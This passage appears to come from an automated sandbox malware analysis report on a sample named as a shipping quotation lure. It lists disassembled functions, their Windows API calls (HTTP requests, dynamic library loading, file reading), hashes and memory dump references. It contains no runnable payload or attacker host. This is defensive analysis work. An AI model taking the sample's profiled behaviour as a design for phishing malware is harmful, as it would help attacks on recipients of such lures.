                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                            • String ID:
                                                                            • API String ID: 3869813825-0
                                                                            • Opcode ID: 642fe5b32b93e281451be319ffc161dc19950f8f9d3baf59ad2d8fdb67eae76c
                                                                            • Instruction ID: 2eb29417fe51611f9244761856da7161a53c49deb932e3feb44c9fc558acbb9a
                                                                            • Opcode Fuzzy Hash: 642fe5b32b93e281451be319ffc161dc19950f8f9d3baf59ad2d8fdb67eae76c
                                                                            • Instruction Fuzzy Hash: F1718F31900B059FDF21DFA9CE95EAEBBFAFF48714F104518E547A2AA0D775A940CB10
                                                                            Function 006C911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • DragQueryPoint.SHELL32(?,?), ref: 006C9147
                                                                              • Part of subcall function 006C7674: ClientToScreen.USER32(?,?), ref: 006C769A
                                                                              • Part of subcall function 006C7674: GetWindowRect.USER32(?,?), ref: 006C7710
                                                                              • Part of subcall function 006C7674: PtInRect.USER32(?,?,006C8B89), ref: 006C7720
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 006C91B0
                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006C91BB
                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006C91DE
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 006C9225
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 006C923E
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 006C9255
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 006C9277
                                                                            • DragFinish.SHELL32(?), ref: 006C927E
                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 006C9371
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#p
                                                                            • API String ID: 221274066-541875553
                                                                            • Opcode ID: b1e0d9c4eaa0694e8a3a09721b17123052017964203533c74379a395b7c3d29d
                                                                            • Instruction ID: e7f44859ca9893cbafc3d6d408e21c459bbd784d6c894199cadb07e84a41049f
                                                                            • Opcode Fuzzy Hash: b1e0d9c4eaa0694e8a3a09721b17123052017964203533c74379a395b7c3d29d
                                                                            • Instruction Fuzzy Hash: 29618E71108301AFC701DF50DC85EAFBBEAEFC8750F40492DF595921A0DB709A49CBA6
                                                                            Function 006500ED Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 87libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0070070C,00000FA0,429C1377,?,?,?,?,006723B3,000000FF), ref: 0065011C
                                                                            • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,006723B3,000000FF), ref: 00650127
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,006723B3,000000FF), ref: 00650138
                                                                            • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0065014E
                                                                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0065015C
                                                                            • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0065016A
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,006723B3,000000FF), ref: 006501B5
                                                                            • DeleteCriticalSection.KERNEL32(0070070C,00000007,?,?,?,?,006723B3,000000FF), ref: 006501E1
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,006723B3,000000FF), ref: 006501F1
                                                                            Strings
                                                                            • InitializeConditionVariable, xrefs: 00650148
                                                                            • SleepConditionVariableCS, xrefs: 00650154
                                                                            • kernel32.dll, xrefs: 00650133
                                                                            • WakeAllConditionVariable, xrefs: 00650162
                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00650122
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleProc$CriticalModuleSection$CloseCountCreateDeleteEventInitializeSpin
                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                            • API String ID: 3758863719-1714406822
                                                                            • Opcode ID: ecd2bfe12a9f30fb1b1faa1d8542266165d85fdd5ff1b213590c00b0db4b62be
                                                                            • Instruction ID: 2b3d055390a9eab879d04545e3b395eecc82f8e565e30a52e3167ad0057cfd59
                                                                            • Opcode Fuzzy Hash: ecd2bfe12a9f30fb1b1faa1d8542266165d85fdd5ff1b213590c00b0db4b62be
                                                                            • Instruction Fuzzy Hash: 2721A671A40700AFEB215BB5AC49F7A37DBEB44B72F045229FC05D2790DE78D8048A95
                                                                            Function 006B3FE9 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,006CCC08), ref: 006B40BB
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 006B40CD
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,006CCC08), ref: 006B40F2
                                                                            • FreeLibrary.KERNEL32(00000000,?,006CCC08), ref: 006B413E
                                                                            • StringFromGUID2.OLE32(?,?,00000028,?,006CCC08), ref: 006B41A8
                                                                            • SysFreeString.OLEAUT32(00000009), ref: 006B4262
                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 006B42C8
                                                                            • SysFreeString.OLEAUT32(?), ref: 006B42F2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                            • API String ID: 354098117-199464113
                                                                            • Opcode ID: 864dd0c533092901c3c8c7a9c2a397c5d4942a856c5a070634000475e3b03f22
                                                                            • Instruction ID: 6c1a0430045dc7766c312075d7ce26892755fd63e1338542e49ec56e302e844f
                                                                            • Opcode Fuzzy Hash: 864dd0c533092901c3c8c7a9c2a397c5d4942a856c5a070634000475e3b03f22
                                                                            • Instruction Fuzzy Hash: 19120CB5A00115EFDB14DF94C884EEEBBB6FF45314F248098E9059B252DB71ED86CBA0
                                                                            Function 006C091E Relevance: 23.1, APIs: 2, Strings: 11, Instructions: 372windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 006C09C6
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006C0A54
                                                                              • Part of subcall function 00692BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00692BFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpper
                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                            • API String ID: 3391685005-4258414348
                                                                            • Opcode ID: ba1e42055c14a13a465adf210195d8c92629b55819f28b20793c3e39842524f0
                                                                            • Instruction ID: fa8fd9e00d2eb3be63764b35febbc94fd365d88d2a2a7450c5a18716cf40fef9
                                                                            • Opcode Fuzzy Hash: ba1e42055c14a13a465adf210195d8c92629b55819f28b20793c3e39842524f0
                                                                            • Instruction Fuzzy Hash: 9CE15535208201DBCB54DF24C450A6AB7E3FF98314F15895DF8969B3A2DB31ED46CB85
                                                                            Function 0063326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetMenuItemCount.USER32(00701990), ref: 00672F8D
                                                                            • GetMenuItemCount.USER32(00701990), ref: 0067303D
                                                                            • GetCursorPos.USER32(?), ref: 00673081
                                                                            • SetForegroundWindow.USER32(00000000), ref: 0067308A
                                                                            • TrackPopupMenuEx.USER32(00701990,00000000,?,00000000,00000000,00000000), ref: 0067309D
                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 006730A9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                            • String ID: 0
                                                                            • API String ID: 36266755-4108050209
                                                                            • Opcode ID: dbabecb33d5e53f6750ff568547fc344c8a369afcd07eaa865aeb385d71b8092
                                                                            • Instruction ID: 8f40d9c732cf8329e0aef3e86302725dd73b4f74a47c23eb3be46c95c24257e3
                                                                            • Opcode Fuzzy Hash: dbabecb33d5e53f6750ff568547fc344c8a369afcd07eaa865aeb385d71b8092
                                                                            • Instruction Fuzzy Hash: 18712A70644216BFEB218F24CD59FEABF66FF04324F208216F518AA3E0C7B1A950D790
                                                                            Function 006A3E79 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 205COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?), ref: 006A3EF8
                                                                            • GetDriveTypeW.KERNEL32(?), ref: 006A3FD6
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006A401E
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006A4059
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006A4087
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: SendString$BuffCharDriveLowerType
                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                            • API String ID: 1600147383-4113822522
                                                                            • Opcode ID: b7d5e92ed1a13fc882aee0dd046e7a3e013d13d7f61b85b92f80ecbe74d9afa2
                                                                            • Instruction ID: 39f05cc0250af23b6eb2023565d86836caa85a6b7b90a559ecb8588cf5729568
                                                                            • Opcode Fuzzy Hash: b7d5e92ed1a13fc882aee0dd046e7a3e013d13d7f61b85b92f80ecbe74d9afa2
                                                                            • Instruction Fuzzy Hash: 8271E0726042119FC310EF24C8818AAB7F6EF95768F10892DF99697351EB30EE45CF91
                                                                            Function 006C833C Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 006C83F2
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006C5BF2), ref: 006C844E
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006C8487
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 006C84CA
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 006C8501
                                                                            • FreeLibrary.KERNEL32(?), ref: 006C850D
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 006C851D
                                                                            • DestroyIcon.USER32(?,?,?,?,?,006C5BF2), ref: 006C852C
                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 006C8549
                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 006C8555
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
                                                                            • String ID: .dll$.exe$.icl
                                                                            • API String ID: 1446636887-1154884017
                                                                            • Opcode ID: b3808d68892904ea01d83c2d21cc04534e51f1b363614dc73e2d78706573451a
                                                                            • Instruction ID: 5c23af33e3eab1e9efa0e2354ad0861822aaae9e6572be857d58878a0a9be858
                                                                            • Opcode Fuzzy Hash: b3808d68892904ea01d83c2d21cc04534e51f1b363614dc73e2d78706573451a
                                                                            • Instruction Fuzzy Hash: ED61BC71500219BEEB289F64CC45FFE77AAEB04721F10864AF915D71D1DFB4AA90CBA0
                                                                            Function 006C6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?), ref: 006C6DEB
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 006C6E5F
                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 006C6E81
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006C6E94
                                                                            • DestroyWindow.USER32(?), ref: 006C6EB5
                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00630000,00000000), ref: 006C6EE4
                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006C6EFD
                                                                            • GetDesktopWindow.USER32 ref: 006C6F16
                                                                            • GetWindowRect.USER32(00000000), ref: 006C6F1D
                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 006C6F35
                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 006C6F4D
                                                                              • Part of subcall function 00649944: GetWindowLongW.USER32(?,000000EB), ref: 00649952
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
                                                                            • String ID: 0$tooltips_class32
                                                                            • API String ID: 1652260434-3619404913
                                                                            • Opcode ID: a019ee3ffcd3a071c815cb7cd0fd3b9fc6ade49418a86c4e869b4854a7083dfd
                                                                            • Instruction ID: 2c8dcc407dfc5a8c097cd936d9129369d58b17cbe2d887690aea5a0b98960e0a
                                                                            • Opcode Fuzzy Hash: a019ee3ffcd3a071c815cb7cd0fd3b9fc6ade49418a86c4e869b4854a7083dfd
                                                                            • Instruction Fuzzy Hash: B2714674104244AFDB21CF18D858FBABBEAFF89314F44851EF99987361CB70A906DB19
                                                                            Function 006AC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006AC4B0
                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 006AC4C3
                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 006AC4D7
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 006AC4F0
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 006AC533
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 006AC549
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006AC554
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006AC584
                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 006AC5DC
                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 006AC5F0
                                                                            • InternetCloseHandle.WININET(00000000), ref: 006AC5FB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                            • String ID:
                                                                            • API String ID: 3800310941-3916222277
                                                                            • Opcode ID: 62247340588faa5c2c80cca097b83b4c43898063e550959d81316d82886391d5
                                                                            • Instruction ID: 31568718a1708eb32981785c5de4adbe8e01eebcae0b6b0a67925f3c98c92a2a
                                                                            • Opcode Fuzzy Hash: 62247340588faa5c2c80cca097b83b4c43898063e550959d81316d82886391d5
                                                                            • Instruction Fuzzy Hash: EC514AB0500204AFDB21AF64C948ABA7BFEEF09764F005419F94996610DB34EE549F60
                                                                            Function 006C856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 006C8592
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006C85A2
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006C85AD
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006C85BA
                                                                            • GlobalLock.KERNEL32(00000000), ref: 006C85C8
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006C85D7
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 006C85E0
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006C85E7
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 006C85F8
                                                                            • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,006CFC38,?), ref: 006C8611
                                                                            • GlobalFree.KERNEL32(00000000), ref: 006C8621
                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 006C8641
                                                                            • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 006C8671
                                                                            • DeleteObject.GDI32(?), ref: 006C8699
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 006C86AF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3840717409-0
                                                                            • Opcode ID: 36d4cda5d022ba9309f52be3a3ef3b2df16f51509b7d14b9f8fd8a277c510208
                                                                            • Instruction ID: bb05d47322be1a6bfca8db18cc5833c4461e67b19c1ceacfdf98225f45550620
                                                                            • Opcode Fuzzy Hash: 36d4cda5d022ba9309f52be3a3ef3b2df16f51509b7d14b9f8fd8a277c510208
                                                                            • Instruction Fuzzy Hash: 5B410A75600204AFDB219FA5DC48EBA7BBAFF89721F148059F909E7260DB749E01DB60
                                                                            Function 006A14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(00000000), ref: 006A1502
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 006A150B
                                                                            • VariantClear.OLEAUT32(?), ref: 006A1517
                                                                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 006A15FB
                                                                            • VarR8FromDec.OLEAUT32(?,?), ref: 006A1657
                                                                            • VariantInit.OLEAUT32(?), ref: 006A1708
                                                                            • SysFreeString.OLEAUT32(?), ref: 006A178C
                                                                            • VariantClear.OLEAUT32(?), ref: 006A17D8
                                                                            • VariantClear.OLEAUT32(?), ref: 006A17E7
                                                                            • VariantInit.OLEAUT32(00000000), ref: 006A1823
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                            • API String ID: 1234038744-3931177956
                                                                            • Opcode ID: 99df7de32d107e427d77dc10cd683a7f8c4b670caa70ebee542d0224e9d44eb4
                                                                            • Instruction ID: df7e1e8b5d3cf3160cf1fffcfe45a2d9ebc773671c94c4b30b9e61af9843cfff
                                                                            • Opcode Fuzzy Hash: 99df7de32d107e427d77dc10cd683a7f8c4b670caa70ebee542d0224e9d44eb4
                                                                            • Instruction Fuzzy Hash: 84D1CCB1A00515EBDB44AFA5D895BB9B7B7BF47700F14805AE446AF280DB30EC42DFA1
                                                                            Function 006BB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
